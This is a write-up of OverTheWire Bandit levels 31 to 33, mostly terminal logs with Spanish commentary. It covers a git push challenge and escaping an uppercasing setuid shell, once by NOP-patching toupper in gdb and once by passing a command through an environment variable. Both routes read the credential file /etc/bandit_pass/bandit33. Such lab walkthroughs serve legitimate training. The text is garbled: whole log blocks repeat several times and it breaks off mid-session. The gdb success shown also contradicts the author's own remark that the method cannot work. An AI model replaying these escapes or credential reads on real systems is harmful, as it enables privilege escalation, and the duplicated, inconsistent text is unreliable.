- Content: 'May I come in?'
- Branch: master
- bandit31@bandit:/tmp/repository4/repo$ git branch -a
- * master
- remotes/origin/HEAD -> origin/master
- remotes/origin/master
- bandit31@bandit:/tmp/repository4/repo$ git tag
- bandit31@bandit:/tmp/repository4/repo$ echo "May I come in?" >> key.txt
- bandit31@bandit:/tmp/repository4/repo$ git add key.txt
- The following paths are ignored by one of your .gitignore files:
- key.txt
- Use -f if you really want to add them.
- bandit31@bandit:/tmp/repository4/repo$ cat .gitignore
- *.txt
- bandit31@bandit:/tmp/repository4/repo$ rm .gitignore
- bandit31@bandit:/tmp/repository4/repo$ git add key.txt
- bandit31@bandit:/tmp/repository4/repo$ git commit -m "commit"
- [master 8a91364] commit
- 1 file changed, 1 insertion(+)
- create mode 100644 key.txt
- bandit31@bandit:/tmp/repository4/repo$ git push origin master
- Could not create directory '/home/bandit31/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit31-git@localhost's password:
- Counting objects: 3, done.
- Delta compression using up to 4 threads.
- Compressing objects: 100% (2/2), done.
- Writing objects: 100% (3/3), 315 bytes | 0 bytes/s, done.
- Total 3 (delta 0), reused 0 (delta 0)
- remote: ### Attempting to validate files... ####
- remote:
- remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
- remote:
- remote: Well done! Here is the password for the next level:
- remote: 56a9bf19c63d650ce78e6ec0354ee45e
- remote:
- remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
- remote:
- To ssh://bandit31-git@localhost/home/bandit31-git/repo
- ! [remote rejected] master -> master (pre-receive hook declined)
- error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'
bandit31@bandit:~$ mkdir /tmp/repository4
bandit31@bandit:~$ cd /tmp/repository4
bandit31@bandit:/tmp/repository4$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
remote: Counting objects: 4, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
Checking connectivity... done.
bandit31@bandit:/tmp/repository4$ cd repo/
bandit31@bandit:/tmp/repository4/repo$ ls
README.md
bandit31@bandit:/tmp/repository4/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/repository4/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master
bandit31@bandit:/tmp/repository4/repo$ git tag
bandit31@bandit:/tmp/repository4/repo$ echo "May I come in?" >> key.txt
bandit31@bandit:/tmp/repository4/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.
bandit31@bandit:/tmp/repository4/repo$ cat .gitignore
*.txt
bandit31@bandit:/tmp/repository4/repo$ rm .gitignore
bandit31@bandit:/tmp/repository4/repo$ git add key.txt
bandit31@bandit:/tmp/repository4/repo$ git commit -m "commit"
[master 8a91364] commit
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/repository4/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 315 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://bandit31-git@localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'Nivel 32 -> Nivel 33
Este nivel se trata de evadir las medidas de seguridad de un binario con el bit s activo. Aquí emplee dos enfoques, uno con ingeniería inversa, que fue una ida de olla pero lo dejo porque puede ser interesante y otro que es la forma correcta en la que se me ocurrió solucionar el reto.
El objetivo se trata de hacer un cat a un fichero en /etc/bandit_pass que contiene la contraseña. Para ello hay que usar el binario con el bit s activo (como en otros nivel). La diferencia es que este binario te habilita una shell donde puedes escribir comandos, pero al ejecutarlos se ejecutan en mayúsculas.
El primer enfoque que usé fue hacer uso de GDB y parquear (nopear, 0x90) las instrucciones que pasan a mayúsculas el comando introducido. El problema con este enfoque es que al depurar programas que tienen el bit s activo este se deshabilita automaticamente por tanto no es posible conseguir la contraseña de esta forma, aún así lo dejo porque puede resultar interesante.
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ ll
total 28
drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
-rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 .profile
-rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
bandit32@bandit:~$ file uppershell
uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
bandit32@bandit:~$ ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: not found
>> ^C
bandit32@bandit:~$ gdb -q ./uppershell
Reading symbols from ./uppershell...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80485c1
(gdb) run
Starting program: /home/bandit32/uppershell
Breakpoint 1, 0x080485c1 in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: call 0x80484a0 <toupper@plt>
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) set *(char*)0x08048666 = 0x90
(gdb) set *(char*)0x08048667 = 0x90
(gdb) set *(char*)0x08048668 = 0x90
(gdb) set *(char*)0x08048669 = 0x90
(gdb) set *(char*)0x0804866a = 0x90
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: nop
0x08048667 <+170>: nop
0x08048668 <+171>: nop
0x08048669 <+172>: nop
0x0804866a <+173>: nop
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) c
Continuing.
WELCOME TO THE UPPERCASE SHELL
>> ls
uppershell
>> cat /etc/bandit_pass/bandit33
56a9bf19c63d650ce78e6ec0354ee45e
- bandit32@bandit:~$ ls
- uppershell
- bandit32@bandit:~$ ll
- total 28
- drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
- drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
- -rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
- -rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
- -rw-r--r-- 1 root root 655 Jun 24 2016 .profile
- -rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
- bandit32@bandit:~$ file uppershell
- uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
- bandit32@bandit:~$ ./uppershell
- WELCOME TO THE UPPERCASE SHELL
- >> ls
- sh: 1: LS: not found
- >> ^C
- bandit32@bandit:~$ gdb -q ./uppershell
- Reading symbols from ./uppershell...(no debugging symbols found)...done.
- (gdb) break main
- Breakpoint 1 at 0x80485c1
- (gdb) run
- Starting program: /home/bandit32/uppershell
- Breakpoint 1, 0x080485c1 in main ()
- (gdb) disassemble
- Dump of assembler code for function main:
- 0x080485bd <+0>: push %ebp
- 0x080485be <+1>: mov %esp,%ebp
- 0x080485c0 <+3>: push %ebx
- => 0x080485c1 <+4>: and $0xfffffff0,%esp
- 0x080485c4 <+7>: sub $0x420,%esp
- 0x080485ca <+13>: mov 0xc(%ebp),%eax
- 0x080485cd <+16>: mov %eax,0xc(%esp)
- 0x080485d1 <+20>: mov %gs:0x14,%eax
- 0x080485d7 <+26>: mov %eax,0x41c(%esp)
- 0x080485de <+33>: xor %eax,%eax
- 0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
- 0x080485e5 <+40>: mov %eax,%ebx
- 0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
- 0x080485ec <+47>: mov %ebx,0x4(%esp)
- 0x080485f0 <+51>: mov %eax,(%esp)
- 0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
- 0x080485f8 <+59>: movl $0x8048720,(%esp)
- 0x080485ff <+66>: call 0x8048450 <puts@plt>
- 0x08048604 <+71>: movl $0x804873f,(%esp)
- 0x0804860b <+78>: call 0x8048410 <printf@plt>
- 0x08048610 <+83>: movl $0x0,(%esp)
- 0x08048617 <+90>: call 0x8048420 <fflush@plt>
- 0x0804861c <+95>: mov 0x804a040,%eax
- 0x08048621 <+100>: mov %eax,0x8(%esp)
- 0x08048625 <+104>: movl $0x3ff,0x4(%esp)
- 0x0804862d <+112>: lea 0x1c(%esp),%eax
- 0x08048631 <+116>: mov %eax,(%esp)
- 0x08048634 <+119>: call 0x8048430 <fgets@plt>
- 0x08048639 <+124>: test %eax,%eax
- 0x0804863b <+126>: jne 0x8048649 <main+140>
- 0x0804863d <+128>: movl $0x1,(%esp)
- 0x08048644 <+135>: call 0x8048470 <exit@plt>
- 0x08048649 <+140>: movl $0x0,0x18(%esp)
- 0x08048651 <+148>: jmp 0x804867c <main+191>
- 0x08048653 <+150>: lea 0x1c(%esp),%edx
- 0x08048657 <+154>: mov 0x18(%esp),%eax
- 0x0804865b <+158>: add %edx,%eax
- ---Type <return> to continue, or q <return> to quit---
- 0x0804865d <+160>: movzbl (%eax),%eax
- 0x08048660 <+163>: movsbl %al,%eax
- 0x08048663 <+166>: mov %eax,(%esp)
- 0x08048666 <+169>: call 0x80484a0 <toupper@plt>
- 0x0804866b <+174>: lea 0x1c(%esp),%ecx
- 0x0804866f <+178>: mov 0x18(%esp),%edx
- 0x08048673 <+182>: add %ecx,%edx
- 0x08048675 <+184>: mov %al,(%edx)
- 0x08048677 <+186>: addl $0x1,0x18(%esp)
- 0x0804867c <+191>: lea 0x1c(%esp),%edx
- 0x08048680 <+195>: mov 0x18(%esp),%eax
- 0x08048684 <+199>: add %edx,%eax
- 0x08048686 <+201>: movzbl (%eax),%eax
- 0x08048689 <+204>: test %al,%al
- 0x0804868b <+206>: jne 0x8048653 <main+150>
- 0x0804868d <+208>: lea 0x1c(%esp),%eax
- 0x08048691 <+212>: mov %eax,(%esp)
- 0x08048694 <+215>: call 0x8048460 <system@plt>
- 0x08048699 <+220>: jmp 0x8048604 <main+71>
- End of assembler dump.
- (gdb) set *(char*)0x08048666 = 0x90
- (gdb) set *(char*)0x08048667 = 0x90
- (gdb) set *(char*)0x08048668 = 0x90
- (gdb) set *(char*)0x08048669 = 0x90
- (gdb) set *(char*)0x0804866a = 0x90
- (gdb) disassemble
- Dump of assembler code for function main:
- 0x080485bd <+0>: push %ebp
- 0x080485be <+1>: mov %esp,%ebp
- 0x080485c0 <+3>: push %ebx
- => 0x080485c1 <+4>: and $0xfffffff0,%esp
- 0x080485c4 <+7>: sub $0x420,%esp
- 0x080485ca <+13>: mov 0xc(%ebp),%eax
- 0x080485cd <+16>: mov %eax,0xc(%esp)
- 0x080485d1 <+20>: mov %gs:0x14,%eax
- 0x080485d7 <+26>: mov %eax,0x41c(%esp)
- 0x080485de <+33>: xor %eax,%eax
- 0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
- 0x080485e5 <+40>: mov %eax,%ebx
- 0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
- 0x080485ec <+47>: mov %ebx,0x4(%esp)
- 0x080485f0 <+51>: mov %eax,(%esp)
- 0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
- 0x080485f8 <+59>: movl $0x8048720,(%esp)
- 0x080485ff <+66>: call 0x8048450 <puts@plt>
- 0x08048604 <+71>: movl $0x804873f,(%esp)
- 0x0804860b <+78>: call 0x8048410 <printf@plt>
- 0x08048610 <+83>: movl $0x0,(%esp)
- 0x08048617 <+90>: call 0x8048420 <fflush@plt>
- 0x0804861c <+95>: mov 0x804a040,%eax
- 0x08048621 <+100>: mov %eax,0x8(%esp)
- 0x08048625 <+104>: movl $0x3ff,0x4(%esp)
- 0x0804862d <+112>: lea 0x1c(%esp),%eax
- 0x08048631 <+116>: mov %eax,(%esp)
- 0x08048634 <+119>: call 0x8048430 <fgets@plt>
- 0x08048639 <+124>: test %eax,%eax
- 0x0804863b <+126>: jne 0x8048649 <main+140>
- 0x0804863d <+128>: movl $0x1,(%esp)
- 0x08048644 <+135>: call 0x8048470 <exit@plt>
- 0x08048649 <+140>: movl $0x0,0x18(%esp)
- 0x08048651 <+148>: jmp 0x804867c <main+191>
- 0x08048653 <+150>: lea 0x1c(%esp),%edx
- 0x08048657 <+154>: mov 0x18(%esp),%eax
- 0x0804865b <+158>: add %edx,%eax
- ---Type <return> to continue, or q <return> to quit---
- 0x0804865d <+160>: movzbl (%eax),%eax
- 0x08048660 <+163>: movsbl %al,%eax
- 0x08048663 <+166>: mov %eax,(%esp)
- 0x08048666 <+169>: nop
- 0x08048667 <+170>: nop
- 0x08048668 <+171>: nop
- 0x08048669 <+172>: nop
- 0x0804866a <+173>: nop
- 0x0804866b <+174>: lea 0x1c(%esp),%ecx
- 0x0804866f <+178>: mov 0x18(%esp),%edx
- 0x08048673 <+182>: add %ecx,%edx
- 0x08048675 <+184>: mov %al,(%edx)
- 0x08048677 <+186>: addl $0x1,0x18(%esp)
- 0x0804867c <+191>: lea 0x1c(%esp),%edx
- 0x08048680 <+195>: mov 0x18(%esp),%eax
- 0x08048684 <+199>: add %edx,%eax
- 0x08048686 <+201>: movzbl (%eax),%eax
- 0x08048689 <+204>: test %al,%al
- 0x0804868b <+206>: jne 0x8048653 <main+150>
- 0x0804868d <+208>: lea 0x1c(%esp),%eax
- 0x08048691 <+212>: mov %eax,(%esp)
- 0x08048694 <+215>: call 0x8048460 <system@plt>
- 0x08048699 <+220>: jmp 0x8048604 <main+71>
- End of assembler dump.
- (gdb) c
- Continuing.
- WELCOME TO THE UPPERCASE SHELL
- >> ls
- uppershell
- >> cat /etc/bandit_pass/bandit33
- 56a9bf19c63d650ce78e6ec0354ee45e
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ ll
total 28
drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
-rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 .profile
-rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
bandit32@bandit:~$ file uppershell
uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
bandit32@bandit:~$ ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: not found
>> ^C
bandit32@bandit:~$ gdb -q ./uppershell
Reading symbols from ./uppershell...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80485c1
(gdb) run
Starting program: /home/bandit32/uppershell
Breakpoint 1, 0x080485c1 in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: call 0x80484a0 <toupper@plt>
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) set *(char*)0x08048666 = 0x90
(gdb) set *(char*)0x08048667 = 0x90
(gdb) set *(char*)0x08048668 = 0x90
(gdb) set *(char*)0x08048669 = 0x90
(gdb) set *(char*)0x0804866a = 0x90
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: nop
0x08048667 <+170>: nop
0x08048668 <+171>: nop
0x08048669 <+172>: nop
0x0804866a <+173>: nop
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) c
Continuing.
WELCOME TO THE UPPERCASE SHELL
>> ls
uppershell
>> cat /etc/bandit_pass/bandit33
56a9bf19c63d650ce78e6ec0354ee45e
El segundo enfoque es almacenar en una variable de entorno el comando que se quiere ejecutar dentro de la shell y dentro de esta shell hacer una llamada a dicha variable (que contiene el comando a ejecutar).
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ ll
total 28
drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
-rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 .profile
-rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
bandit32@bandit:~$ file uppershell
uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
bandit32@bandit:~$ ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> cat /etc/bandit_pass/bandit33
sh: 1: CAT: not found
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ COMMAND="cat /etc/bandit_pass/bandit33" ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> $COMMAND
